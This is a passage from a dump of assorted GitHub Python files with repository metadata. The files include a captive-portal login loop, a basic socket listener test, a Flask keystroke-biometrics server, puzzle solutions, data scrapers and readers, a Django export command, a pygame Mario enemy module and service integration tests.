' + username)\n while(True):\n try:\n r2 = requests.get(url='http://192.168.1.3:8090/live?mode=192&username=' +\n username+'&a='+str(time.time())+'&producttype=0')\n if(not r2.ok):\n print('An error occured: ' + str(r) + ' Retrying...')\n try:\n r = requests.post(url=url, data=data)\n except:\n print(\"An unknown error occured\")\n if(r.ok):\n print('Login successful for ' + username)\n except:\n print(\"An unknown error occured\")\n time.sleep(170)\n\n else:\n print('Login failed successfully: Error code ' + str(r))\n input('Press any key to continue...')\nexcept:\n print('Login failed successfully: An unknown error occured')\n input('Press any key to continue...')\n","repo_name":"Chirayu18/dotfiles","sub_path":"dot_config/nvim/executable_main.py","file_name":"executable_main.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5421634718","text":"import socket\n\n# 服务器地址列表\ncliList = []\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# 绑定IP和端口,0.0.0.0表示绑定到所有的网络地址,但端口需要不被占用\ns.bind(('0.0.0.0', 7786))\n\n# 开启监听器,设置最大连接数10\ns.listen(10)\n\n# 循环等待新的连接,且将已连接的对象添加到列表中\nwhile True:\n # 接受一个新的连接\n sock, addr = s.accept()\n # 添加新的连接到列表\n cliList.append(sock)\n ## 测试:显示已连接的客户机IP\n for client_ip in cliList:\n print(\"Cliend IP: \" + str(client_ip))\n","repo_name":"satan1a/DDoS_Attacket_v0.1","sub_path":"test/socket_server_test.py","file_name":"socket_server_test.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"zh","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"29284939518","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom compare import compare, getavg, movavg\nfrom pymongo import MongoClient\n\nimport os.path\nimport json\n\n\napp = Flask(\"Attackathon\")\nCORS(app)\n\nclient = MongoClient()\ndb = client.attackathon\n\n@app.route('/login', methods=['GET', 'POST'])\ndef attempt_login():\n print(request.data)\n return jsonify(\"This is the login.\")\n\n\ncost_threshold = 50\n\n\n@app.route('/compare', methods=['GET', 'POST'])\ndef attempt_compare():\n reg = json.loads(request.data.decode(\"utf-8\"))\n required = [\"data\", \"email\"]\n for r in required:\n if r not in reg:\n return jsonify({\"error\": \"invalid request\"})\n\n data, text = reg[\"data\"], reg[\"email\"]\n\n obj = db.users.find_one({\"name\": text})\n if obj is None:\n return jsonify({\"error\": \"I could not find you :(\"})\n\n register_avg = obj[\"data\"]\n\n costs = compare(register_avg, data)\n\n if \"blank\" not in costs:\n return jsonify(costs)\n\n blank, held = costs[\"blank\"], costs[\"held\"]\n\n total_cost = 0.8 * blank + 0.2 * held\n print(\"Costs: (%f, %f, %f)\" % (blank, held, total_cost))\n\n if total_cost < cost_threshold:\n n_avg = movavg(register_avg, data)\n db.users.update({\"data\": n_avg}, {\"name\": text})\n\n\n return jsonify(total_cost < cost_threshold)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef attempt_register():\n reg = json.loads(request.data.decode(\"utf-8\"))\n\n required = [\"1\", \"2\", \"email1\", \"email2\"]\n for r in required:\n if r not in reg:\n return jsonify({\"error\": \"invalid request\"})\n \n\n data1, data2 = reg[\"1\"], reg[\"2\"]\n\n tw1, tw2 = reg[\"email1\"], reg[\"email2\"]\n avg = getavg(data1, data2)\n\n if avg is None:\n return jsonify({\"error\": \"invalid request\"})\n\n # Word inputs must match\n if tw1 != tw2:\n return jsonify({\"error\": \"invalid text\"})\n\n db.users.update({\"name\": tw1}, {\"name\": tw1, \"data\": avg}, upsert=True)\n \n return jsonify({ \"good\": \"we're all good here\"})\n\n\n@app.route('/', defaults={'path': 'index.html'}, methods=['GET','POST'])\n@app.route('/')\ndef route_path(path):\n fname = 'docs/%s' % path\n\n # Option two: local file (one of Eric's) \n if os.path.isfile(fname):\n f = open(fname, \"r\")\n out = f.read()\n f.close()\n return out\n\n else:\n # Error\n print(request.data)\n return \"That page doesn't exist yet. You should make it.\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=443)\n","repo_name":"attackathon/keycore","sub_path":"chris/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23568829391","text":"from itertools import groupby\nimport math\n\n\"\"\"\n I KNOW ITS SLOW BUT I WANTED TO TRY THIS SOLUTION ANYWAY\n\"\"\"\nFREE = False\nOCCUPIED = True\n\n\ndef get_stall_value(stalls, stall_index):\n left_free_space = right_free_space = 0\n tmp_index = stall_index\n\n while True:\n tmp_index -= 1\n if stalls[tmp_index] == OCCUPIED:\n break\n left_free_space += 1\n\n tmp_index = stall_index\n while True:\n tmp_index += 1\n if stalls[tmp_index] == OCCUPIED:\n break\n right_free_space += 1\n\n return left_free_space, right_free_space\n\n\ndef go_into_next_stall(stalls):\n final_index = 0\n\n grouped = groupby(stalls)\n max_len = 0\n for key, group in groupby(stalls):\n if key == FREE:\n max_len = max(max_len, len(list(group)))\n\n for key, group in grouped:\n group = list(group)\n group_len = len(group)\n if key == OCCUPIED or group_len != max_len:\n final_index += group_len\n else:\n final_index += int((group_len - 1) / 2)\n l_val, r_val = math.ceil((group_len - 1) / 2), math.floor((group_len - 1) / 2)\n break\n\n stalls[final_index] = OCCUPIED\n return l_val, r_val\n\n\ndef get_values(nbr_stalls, nbr_people):\n stalls = [FREE] * nbr_stalls\n stalls = [OCCUPIED] + stalls + [OCCUPIED]\n\n for people in range(nbr_people):\n l_val, r_val = go_into_next_stall(stalls)\n return l_val, r_val\n\n\ndef main():\n nbr_rows = int(input())\n\n for nbr_row in range(1, nbr_rows + 1):\n nbr_stalls, nbr_people = map(int, input().split())\n l_val, r_val = get_values(nbr_stalls, nbr_people)\n print(\"Case #{nbr_rows}: {l_val} {r_val}\".format(\n nbr_rows=nbr_row, l_val=l_val, r_val=r_val))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1935.py","file_name":"1935.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30225027136","text":"from numpy.linalg import inv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#2d case\nclass NDSphere:\n def __init__(self, center, radius):\n self.center = center\n self.radius = radius\n self.dim = center.shape[0]\n\n def generate_sample(self, N):\n\n vec = np.random.rand(N, self.dim) - 0.5\n vec = vec/np.linalg.norm(vec, axis=1, keepdims=True)\n return self.radius * vec + self.center.reshape(1, -1) + 0.1*np.random.randn(N, self.dim)\n\nsphere = NDSphere(np.array([3., 1.]),1.0)\n\ndata = sphere.generate_sample(100)\n\n# plt.plot(data[:,0], data[:,1], 'o')\n# plt.show()\n\ng = np.mean(data, axis=0, keepdims=False)\ng = np.hstack([g, np.zeros(1)]).reshape(-1, 1)\nH = - np.identity(sphere.dim + 1)\nH[-1, -1] = 1.0\nprint(g)\nprint(H)\n\nprint(inv(H) @ g)","repo_name":"DonghyunSung-MS/retarget_gui","sub_path":"test/est_sph.py","file_name":"est_sph.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43427318550","text":"#!/usr/bin/env python3\n\nimport os\nfrom dotenv import load_dotenv\n\nfrom bs4 import BeautifulSoup as bsp\nimport pickle\nimport pandas as pd\n\nif __name__ == '__main__':\n\n load_dotenv()\n\n l = pickle.load(open('{}voglist.txt'.format(os.getenv('BASE_PATH')), 'rb'))\n print(len(l))\n mainList = []\n \n for i in l:\n tempList = []\n soup = bsp(i, 'html.parser')\n for j in soup.children:\n try:\n for k in j.children:\n try:\n for m in k.children:\n try:\n for n in m.children:\n print(n)\n except:\n tempList.append(m)\n except:\n tempList.append(k)\n except:\n tempList.append(j)\n mainList.append(tempList)\n\n df = pd.DataFrame(mainList, columns = ['VOG number',\n 'Viral Quotient',\n 'Host Domain',\n 'Number of Proteins',\n 'Number of Genomes',\n 'Number of known Virus Families',\n 'Number of Known Virus Genera',\n 'Protein Annotations',\n 'Protein Annotations Mapping to POGs 2013'])\n\n writer = pd.ExcelWriter('{}pVOG.xlsx'.format(os.getenv('BASE_PATH')), engine = 'xlsxwriter') # pylint: disable=abstract-class-instantiated\n df.to_excel(writer, sheet_name = 'Sheet1', index = False)\n writer.save()\n","repo_name":"abhinavyesss/ProphageFinder","sub_path":"createvogdb.py","file_name":"createvogdb.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1565016692","text":"\n# local imports\nfrom text_data import *\n\ndef read_DS3505(filepath, has_headers = True):\n \"\"\"\n Text reader for DS3505 data (space delimited) with some fixes\n \n Weather data downloaded from the following website has a peculiarity\n [http://gis.ncdc.noaa.gov/map/viewer/#app=cdo&cfg=cdo&theme=hourly&layers=1&node=gi]\n in that it has some upercase T's that are rarely needed, but ruin otherwise\n uniform space formatting.\n\n :param filepath: filepath to DS3505 data\n :param has_headers: set False if filepath does not have headers. This doesn't seem\n to ever happen for DS3505 data.\n :return tdo: returns a text data object with DS3505 data in it.\n \"\"\"\n \n with open(filepath, 'r') as f:\n\n data = []\n\n if has_headers:\n headers = next(f).replace('\\n','').split(' ')\n headers = [x for x in headers if x != \"\"]\n else:\n headers = None\n\n for line in f:\n entry = line.replace(\"T\",\" \").replace(\"\\n\",\"\").split(' ')\n entry = [x for x in entry if x!= \"\"] # remove empties\n data.append(entry)\n f.close()\n \n print(\"Loaded data from '{0}'\".format(filepath))\n\n # assemble the text data object and return it\n tdo = text_data(text_filepath = filepath,\n headers = headers,\n row_data = data)\n \n return tdo\n","repo_name":"NASA-DEVELOP/dnppy","sub_path":"dnppy/textio/read_DS3505.py","file_name":"read_DS3505.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"11536394766","text":"from django.core.management.base import BaseCommand\nimport csv\n\nfrom social_balance.models import BalanceProcess\nfrom social_balance.models.balance import EntitySocialBalance\nfrom accounts.models.account import Entity, Provider, Colaborator\n\n\ndef get_social_balance_statuses(entity, years):\n statuses = []\n for year in years:\n sb = EntitySocialBalance.objects.filter(entity=entity, year=year).first()\n if sb:\n if sb.done:\n status = 'REALIZADO'\n elif sb.is_exempt:\n status = 'EXENTA'\n else:\n status = 'NO REALIZADO'\n statuses.append(status)\n else:\n statuses.append(\"\")\n\n return statuses\n\n\ndef get_sponsor_last_year(entity, year):\n last_process = BalanceProcess.objects.filter(account=entity, year=year).first()\n if last_process and last_process.sponsor:\n sponsor = last_process.sponsor.first_name + \" \" + last_process.sponsor.last_name\n else:\n sponsor = \"\"\n return sponsor\n\n\ndef get_type_entity(entity):\n if isinstance(entity, Provider):\n return 'Proveedora'\n elif isinstance(entity, Colaborator):\n if entity.is_sponsor:\n return \"Patrocinadora\"\n elif entity.is_collaborator:\n return \"Colaboradora\"\n\n return \"\"\n\n\nclass Command(BaseCommand):\n help = 'Export list of entities with social balace status of last years'\n\n def add_arguments(self, parser):\n\n parser.add_argument('year_start', type=int, help='Year start')\n parser.add_argument('year_end', type=int, help='Year end')\n\n def handle(self, *args, **options):\n\n year_start = options['year_start']\n year_end = options['year_end']\n\n years = list(range(year_start, year_end + 1))\n\n headers = ['Nombre', 'Email', 'Telefono', 'Tipo', 'Año de constitución',\n 'Fecha de alta MES', 'Madrina ultimo año'] + years\n data = []\n\n entities = Entity.objects.active()\n\n print(f'Active entities: {len(entities)}')\n\n for entity in entities:\n name = entity.name\n email = entity.contact_email\n phone = entity.contact_phone\n start_year = entity.start_year\n registration_date = str(entity.registration_date)\n\n sponsor = get_sponsor_last_year(entity, years[len(years) - 1])\n entity_type = get_type_entity(entity)\n\n sb = get_social_balance_statuses(entity, years)\n\n data.append([name, email, phone, entity_type, start_year, registration_date, sponsor] + sb)\n\n with open('balances_sociales.csv', 'w') as f:\n write = csv.writer(f, delimiter=';')\n write.writerow(headers)\n write.writerows(data)\n\n print(\"Exported\")\n\n\n","repo_name":"Mercado-Social-de-Madrid/gestionMES","sub_path":"currency/management/commands/export_social_balance_history.py","file_name":"export_social_balance_history.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"18484697115","text":"from pathlib import Path\nimport re\nimport itertools\n\npuzzle_input_path = Path(__file__).parent / \"input.txt\"\n\nwith open(puzzle_input_path) as puzzle_input_file:\n puzzle_input_raw = puzzle_input_file.read() \n\nmoons_coords = [tuple(int(x) for x in re.findall(r\"\\w=([0-9-]+)\", m)) for m in puzzle_input_raw.splitlines()]\nmoons_velocities = [(0, 0, 0) for _ in range(len(moons_coords))]\n\ncmp = lambda x, y: (x > y) - (x < y)\napply = lambda x, y: tuple(map(sum, zip(x, y)))\napply_list = lambda x, y: [apply(c, v) for c, v in zip(x, y)]\n\n\ndef time_step(moons_coords, moons_velocities):\n # apply gravity\n for (moon_idx, moon_coords), (other_moon_idx, other_moon_coords) in itertools.combinations(enumerate(moons_coords), 2):\n gravity_delta = tuple(itertools.starmap(cmp, zip(moon_coords, other_moon_coords)))\n moons_velocities[moon_idx] = apply(moons_velocities[moon_idx], tuple(x * -1 for x in gravity_delta))\n moons_velocities[other_moon_idx] = apply(moons_velocities[other_moon_idx], gravity_delta)\n\n # apply velocity\n return apply_list(moons_coords, moons_velocities), moons_velocities\n\n\nfor _ in range(1_000):\n moons_coords, moons_velocities = time_step(moons_coords, moons_velocities)\n\ne_pots = [sum(map(abs, m)) for m in moons_coords]\ne_kins = [sum(map(abs, v)) for v in moons_velocities]\ne_tot = sum(p * k for p, k in zip(e_pots, e_kins))\nprint(e_tot)","repo_name":"timofurrer/aoc","sub_path":"2019/12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13030557957","text":"#编写者:cwt\n#时间:2022/7/4 21:17\n#敌人\n\nimport pygame\nfrom source import setup,tools,constants\nfrom source.components import box\n\n'''myself'''\n# class Enemy(pygame.sprite.Sprite):\n# def __init__(self,x,y,direction,type,color=None):\n# pygame.sprite.Sprite.__init__(self)\n# self.x=x\n# self.y=y\n# self.direction=direction\n# self.type=type\n# self.frame_index=0 #帧图片索引,用来切换帧\n# self.frames=[] #存储将要切换的帧图片\n# frame_rects={\n# (0,16,16,16),\n# (16,16,16,16)\n# } #循环使用两帧实现相互切换\n# #self.image=tools.get_image(setup.GRAPHICS['enemies'],0,16,16,16,(0,0,0),2.5)\n# self.load_frames(frame_rects)\n#\n# self.image=self.frames[self.frame_index]\n#\n# self.rect=self.image.get_rect()\n# self.rect.x=self.x\n# self.rect.bottom=self.y\n# self.timer = 0 # 计时器\n#\n#\n# def load_frames(self, frame_rects):\n# sheet = setup.GRAPHICS['enemies']\n# for frame_rect in frame_rects:\n# self.frames.append(\n# tools.get_image(sheet, *frame_rect, (0, 0, 0), 2.5)) # *frame_rect解包,把该元组放入时分解成四个变量\n# print(self.frames)\n# def update(self):\n# self.current_time = pygame.time.get_ticks() # 获取当前时间\n# frame_durations = [125, 125] # 停留时间\n#\n# if self.timer == 0:\n# self.timer = self.current_time\n# elif self.current_time - self.timer > frame_durations[self.frame_index]:\n# self.frame_index += 1\n# self.frame_index %= 2\n# self.timer = self.current_time\n#\n# self.image = self.frames[self.frame_index]\n\ndef create_enemy(enemy_data):\n\n enemy_type=enemy_data['type']\n x,y,direction,color = enemy_data['x'],enemy_data['y'],enemy_data['direction'],enemy_data['color']\n #print('11')\n if enemy_type ==0: #Goomba 蘑菇怪\n enemy=Goomba(x,y,direction,\"gooba\",color)\n #print(enemy)\n elif enemy_type ==1: #Koopa 乌龟\n #print('99')\n enemy=Koopa(x,y,direction,\"koopa\",color)\n else:\n # print('99')\n enemy = Koopa(x, y, direction, \"koopa\", color)\n\n return enemy\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self,x,bottom_y,direction,name,frame_rects):\n pygame.sprite.Sprite.__init__(self)\n #print('33')\n\n self.direction=direction\n self.name=name\n self.frame_index = 0\n self.left_frames=[]\n self.right_frames=[]\n self.load_frames(frame_rects)\n self.frames=self.left_frames if self.direction ==0 else self.right_frames\n # print(self.frames)\n self.image=self.frames[self.frame_index]\n #print(self.image)\n self.rect=self.image.get_rect()\n self.rect.x=x\n self.rect.bottom=bottom_y\n \n self.timer = 0 # 计时器\n self.x_vel = -1 *constants.ENEMY_SPEED if self.direction == 0 else constants.ENEMY_SPEED #如果野怪面朝左,就让它有一个向左的速度,否则反之\n self.y_vel = 0\n self.gravity = constants.GRAVITY\n self.state = 'walk'\n\n def load_frames(self,frame_rects):\n for frame_rect in frame_rects:\n left_frame=tools.get_image(setup.GRAPHICS['enemies'],*frame_rect,(0,0,0),constants.ENEMY_MULTI)\n right_frame=pygame.transform.flip(left_frame,True,False) #第一个参数图像,第二个是否水平翻转,第三个是否垂直翻转\n self.left_frames.append(left_frame)\n self.right_frames.append(right_frame)\n\n def update(self,level):\n '''适用于间隔时间不同'''\n # self.current_time = pygame.time.get_ticks() # 获取当前时间\n # frame_durations = [125, 125] # 停留时间\n #\n # if self.timer == 0:\n # self.timer = self.current_time\n # elif self.current_time - self.timer > frame_durations[self.frame_index]:\n # self.frame_index += 1\n # self.frame_index %= 2\n # self.timer = self.current_time\n #\n # self.image = self.frames[self.frame_index]\n self.current_time=pygame.time.get_ticks()\n self.handle_states(level)\n self.update_position(level) #位置更新\n\n\n def handle_states(self,level): #使用状态机处理野怪状态\n\n if self.state == 'walk':\n self.walk()\n elif self.state == 'fall':\n self.fall()\n elif self.state == 'die':\n self.die()\n elif self.state == 'trampled': #踩踏\n self.trampled(level)\n elif self.state == 'slide': # 滑行\n self.slide()\n if self.direction:\n self.image = self.right_frames[self.frame_index]\n else:\n self.image = self.left_frames[self.frame_index]\n\n def walk(self):\n if self.current_time - self.timer >125:\n self.frame_index=(self.frame_index+1)%2\n self.image=self.frames[self.frame_index]\n self.timer=self.current_time\n def fall(self):\n # if self.y_vel <10:\n self.y_vel += self.gravity\n def die(self):\n\n self.rect.x += self.x_vel\n self.rect.y += self.y_vel\n self.y_vel += self.gravity\n if self.rect.y > constants.SCREEN_H:\n self.kill()\n def trampled(self,level):\n pass\n def slide(self):\n pass\n\n def update_position(self,level):\n self.rect.x += self.x_vel\n self.check_x_collisions(level) #x方向碰撞检测\n self.rect.y += self.y_vel\n if self.state != 'die':\n self.check_y_collisions(level)#y方向碰撞检测\n def check_x_collisions(self,level):\n sprite = pygame.sprite.spritecollideany(self,level.ground_items_group)\n if sprite:\n #self.direction =1 if self.direction == 0 else 0\n if self.direction: #向右\n self.direction =0\n self.rect.right = sprite.rect.left\n else:\n self.direction = 1\n self.rect.left = sprite.rect.right\n self.x_vel *=-1\n\n if self.state =='slide':\n enemy =pygame.sprite.spritecollideany(self,level.enemy_group)\n if enemy:\n enemy.go_die(how='slided',direction=self.direction)\n level.enemy_group.remove(enemy)\n level.dying_group.add(enemy)\n\n\n def check_y_collisions(self,level):\n #print('yyys')\n check_group= pygame.sprite.Group(level.ground_items_group,level.brick_group,level.box_group)\n sprite = pygame.sprite.spritecollideany(self,check_group)\n if sprite:\n #print('野怪头部{0},野怪脚底{2},碰撞物体头部{3}',self.rect.top,self.rect.bottom,sprite.rect.top)\n if self.rect.top < sprite.rect.top: # ??从上往下掉落 已解决:坐标轴原因\n self.rect.bottom =sprite.rect.top\n self.y_vel = 0\n self.state='walk'\n level.check_will_fail(self)\n\n def go_die(self,how,direction=1):\n #self.kill()\n self.death_time = self.current_time\n if how in ['bumped','slided']: #各种死因\n self.x_vel =constants.ENEMY_SPEED * direction\n self.y_vel=-8\n self.gravity=0.5\n self.state='die'\n self.frame_index=2\n elif how=='trampled':\n self.state='trampled'\n\n\n\n\n\n\n\nclass Goomba(Enemy):\n def __init__(self,x,y,direction,name,color):\n #print('22')\n\n bright_rect_frames = [(0, 16, 16, 16), (16, 16, 16, 16),(32,16,16,16)]\n daek_rect_frames = [(0, 48, 16, 16), (16, 48, 16, 16),(32,48,16,16)]\n\n if not color:\n frame_rects = bright_rect_frames\n else:\n frame_rects = daek_rect_frames\n Enemy.__init__(self,x,y,direction,name,frame_rects)\n\n def trampled(self,level):\n self.x_vel = 0\n self.frame_index = 2\n if self.death_time == 0 :\n self.death_time == self.current_time\n if self.current_time - self.death_time >500: #野怪死亡500毫秒\n self.kill()\n\n\nclass Koopa(Enemy):\n def __init__(self, x, y, direction, name, color):\n #print('44')\n\n bright_rect_frames = [(96, 9, 16, 22), (112, 9, 16, 22), (160, 9, 16, 22)]\n daek_rect_frames = [(96, 9, 16, 22), (112, 9, 16, 22), (160, 9, 16, 22)]\n\n if not color:\n frame_rects = bright_rect_frames\n else:\n frame_rects = daek_rect_frames\n Enemy.__init__(self,x, y, direction, name, frame_rects)\n\n '''龟壳长时间不去撞击,乌龟会重新钻出来'''\n self.shell_timer = 0\n\n\n def trampled(self,level):\n self.x_vel = 0\n self.frame_index = 2\n # if self.death_time == 0 :\n # self.death_time == self.current_time\n # if self.current_time - self.death_time >500: #野怪死亡500毫秒\n # self.kill()\n\n if self.shell_timer ==0:\n self.shell_timer =self.current_time\n if self.current_time -self.shell_timer >5000:\n self.state='walk'\n self.x_vel = -constants.ENEMY_SPEED if self.direction ==0 else constants.ENEMY_SPEED\n level.enemy_group.add(self) #加入乌龟组\n level.shell_group.remove(self)\n self.shell_timer =0\n def slide(self):\n pass\n\n","repo_name":"cwt2022/Mario","sub_path":"source/components/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":9476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"34741036859","text":"from core.common.utilities.helpers import ensure_id\nfrom tests.integration_tests.utilities.data_access_misc_queries import insert_test_company, insert_test_store, insert_test_rir, insert_test_company_competition_instance\nfrom tests.integration_tests.framework.svc_test_collection import ServiceTestCollection\nfrom common.utilities.inversion_of_control import Dependency\nfrom common.service_access.utilities.errors import ServiceCallError\nfrom bson.objectid import ObjectId\n\n\n__author__ = \"vgold\"\n\n\nclass WFSCleanupTasksTestCollection(ServiceTestCollection):\n\n def initialize(self):\n\n # get params builder\n self.main_params = Dependency(\"CoreAPIParamsBuilder\").value\n\n # context\n self._context = {\n \"user_id\": ObjectId(),\n \"source\": \"wfs_cleanup_tasks_test_collection.py\"\n }\n\n def setUp(self):\n\n self.mds_access.call_delete_reset_database()\n\n def test_most_correct_rir_fixer(self):\n\n cid = insert_test_company(type=\"retail_banner\")\n\n sid1 = insert_test_store(cid, [None, None])\n sid2 = insert_test_store(cid, [None, None])\n sid3 = insert_test_store(cid, [None, None])\n sid4 = insert_test_store(cid, [None, None])\n sid5 = insert_test_store(cid, [None, None])\n\n rid1 = insert_test_rir(self.context, cid, is_most_correct=True)\n rid2 = insert_test_rir(self.context, cid)\n rid3 = insert_test_rir(self.context, cid)\n rid4 = insert_test_rir(self.context, cid, is_most_correct=True)\n rid5 = insert_test_rir(self.context, cid)\n\n self._link_rir_to_store(rid1, sid1, is_most_correct=True)\n self._link_rir_to_store(rid2, sid2, is_most_correct=True)\n self._link_rir_to_store(rid3, sid3, is_most_correct=True)\n self._link_rir_to_store(rid4, sid4)\n self._link_rir_to_store(rid5, sid5)\n\n # rub, baby, run!\n task_rec = {\n \"input\": { \"scheduled\": False },\n \"meta\": { \"async\": False }\n }\n self.main_access.wfs.call_task_new(\"retail_curation\", \"cleanup\", \"most_correct_rir_fixer\", task_rec, self.context)\n\n # verify each rir is now correct... oy vey.\n self._verify_rir(rid1, True)\n self._verify_rir(rid2, True)\n self._verify_rir(rid3, True)\n self._verify_rir(rid4, False)\n self._verify_rir(rid5, False)\n\n def test_orphan_task_fixer(self):\n\n # create two test RIRs\n company_id = insert_test_company()\n rir1_id = insert_test_rir(self.context, company_id)\n rir2_id = insert_test_rir(self.context, company_id)\n\n # create validation tasks for the test RIRs\n tasks = []\n for rir_id in [rir1_id, rir2_id]:\n validation_task_rec = {\n \"input\": {\"target_rir_id\": rir_id},\n \"meta\": {\"async\": False}\n }\n task = self.wfs_access.call_task_new(\"retail_curation\", \"input_sourcing\", \"churn_validation\",\n validation_task_rec, self.context)\n\n # make the task in progress so that the fixer fixes it\n update_params = {\"task_status.status\":\"in_progress\"}\n self.wfs_access.call_update_task_id(task[\"_id\"], self.context, params=update_params)\n task[\"task_status\"][\"status\"] = \"in_progress\"\n\n tasks.append(task)\n\n # delete one of the test RIRs to make an orphan\n deleted = self.mds_access.call_del_entity(\"retail_input_record\", rir1_id)\n\n # call orphan task fixer, which should FIX IT by archiving the first task and then deleting it\n # it should not touch the second task\n result = self.__run_and_test_orphan_task_fixer()\n\n # try to find the fixed task in archive collection\n archived_params = {\"archived\": True}\n archived_task = self.wfs_access.call_get_task_id(tasks[0][\"_id\"], self.context, archived_params)\n\n # check the IDs match (other tests are in test_wfs_archive_task\n self.test_case.assertEqual(tasks[0][\"_id\"], archived_task[\"original_id\"])\n\n # try to find the task in the normal way, which should raise a 404 error since the task should be missing\n self.test_case.assertRaises(ServiceCallError,\n self.wfs_access.call_get_task_id,\n *(tasks[0][\"_id\"], self.context))\n\n\n # make sure the other task is still there in the regular collection and hasn't been changed\n untouched_task = self.wfs_access.call_get_task_id(tasks[1][\"_id\"], self.context)\n self.test_case.assertEqual(tasks[1], untouched_task)\n\n # try to find the task with an archived search, which should raise a 404 since the untouched task shouldn't have been archived\n self.test_case.assertRaises(ServiceCallError,\n self.wfs_access.call_get_task_id,\n *(tasks[1][\"_id\"], self.context, archived_params))\n\n def test_orphan_cci_fixer(self):\n\n # make test companies\n company_id1 = insert_test_company(name=\"ABC\")\n company_id2 = insert_test_company(name=\"Easy as 123\")\n company_id3 = insert_test_company(name=\"Do re mi\")\n company_id4 = insert_test_company(name=\"You and me\")\n\n # pair 'em up\n _ = insert_test_company_competition_instance(company_id1, company_id2)\n _ = insert_test_company_competition_instance(company_id3, company_id4)\n\n # make sure we have CCIs for the pairs\n query = {\n \"$or\":[\n {\"data.pair.entity_id_from\": ensure_id(company_id1), \"data.pair.entity_id_to\": ensure_id(company_id2)},\n {\"data.pair.entity_id_from\": ensure_id(company_id2), \"data.pair.entity_id_to\": ensure_id(company_id1)},\n {\"data.pair.entity_id_from\": ensure_id(company_id3), \"data.pair.entity_id_to\": ensure_id(company_id4)},\n {\"data.pair.entity_id_from\": ensure_id(company_id4), \"data.pair.entity_id_to\": ensure_id(company_id3)}\n ]\n }\n fields = [\"_id\", \"name\", \"data\"]\n params = self.main_params.mds.create_params(resource=\"find_entities_raw\", query=query, entity_fields=fields)[\"params\"]\n ccis = self.main_access.mds.call_find_entities_raw(\"company_competition_instance\", params, self.context)\n\n # should be 4 CCIs\n self.test_case.assertEqual(len(ccis), 4)\n\n # delete one of the companies\n self.main_access.mds.call_del_entity(\"company\", company_id1)\n\n # run orphan cci fixer\n self.__run_and_test_orphan_cci_fixer()\n\n # make sure we have 2 CCIs left; the other two should be deleted\n query = {\n \"$or\":[\n {\"data.pair.entity_id_from\": ensure_id(company_id1), \"data.pair.entity_id_to\": ensure_id(company_id2)},\n {\"data.pair.entity_id_from\": ensure_id(company_id2), \"data.pair.entity_id_to\": ensure_id(company_id1)},\n {\"data.pair.entity_id_from\": ensure_id(company_id3), \"data.pair.entity_id_to\": ensure_id(company_id4)},\n {\"data.pair.entity_id_from\": ensure_id(company_id4), \"data.pair.entity_id_to\": ensure_id(company_id3)}\n ]\n }\n fields = [\"_id\", \"name\", \"data\"]\n params = self.main_params.mds.create_params(resource=\"find_entities_raw\", query=query, entity_fields=fields)[\"params\"]\n ccis = self.main_access.mds.call_find_entities_raw(\"company_competition_instance\", params, self.context)\n\n # should be 2 CCIs\n self.test_case.assertEqual(len(ccis), 2)\n\n\n\n # -------------------------- Private Helpers --------------------------- #\n\n def _verify_rir(self, rir_id, is_most_correct):\n\n # query rir\n query = { \"_id\": rir_id }\n fields = [\"_id\", \"data.is_most_correct\"]\n params = self.main_params.mds.create_params(resource=\"find_entities_raw\", query=query, entity_fields=fields)[\"params\"]\n rir = self.main_access.mds.call_find_entities_raw(\"retail_input_record\", params, self.context)[0]\n\n # sweet\n self.test_case.assertEqual(rir[\"data\"][\"is_most_correct\"], is_most_correct)\n\n\n def _link_rir_to_store(self, rir_id, store_id, is_most_correct=False):\n\n self.main_access.mds.call_add_link(\"retail_input_record\", rir_id, \"retail_input_record\", \"store\", store_id,\n \"store\", \"retail_input\", self.context)\n\n if is_most_correct:\n self.main_access.mds.call_add_link(\"retail_input_record\", rir_id, \"most_correct_record\", \"store\", store_id,\n \"store\", \"retail_input\", self.context)\n\n def __run_and_test_orphan_task_fixer(self):\n\n fixer_task_rec = {\n \"input\": {\"scheduled\": False},\n \"meta\": {\"async\": False}\n }\n result = self.main_access.wfs.call_task_new(\"retail_curation\", \"cleanup\", \"orphan_task_fixer\",\n fixer_task_rec, self.context)\n\n self.test_case.assertEqual(result[\"task_status\"][\"status\"], \"stopped\")\n return result\n\n def __run_and_test_orphan_cci_fixer(self):\n\n fixer_task_rec = {\n \"input\": {\"scheduled\": False},\n \"meta\": {\"async\": False}\n }\n result = self.main_access.wfs.call_task_new(\"retail_curation\", \"cleanup\", \"orphan_cci_fixer\",\n fixer_task_rec, self.context)\n\n self.test_case.assertEqual(result[\"task_status\"][\"status\"], \"stopped\")\n return 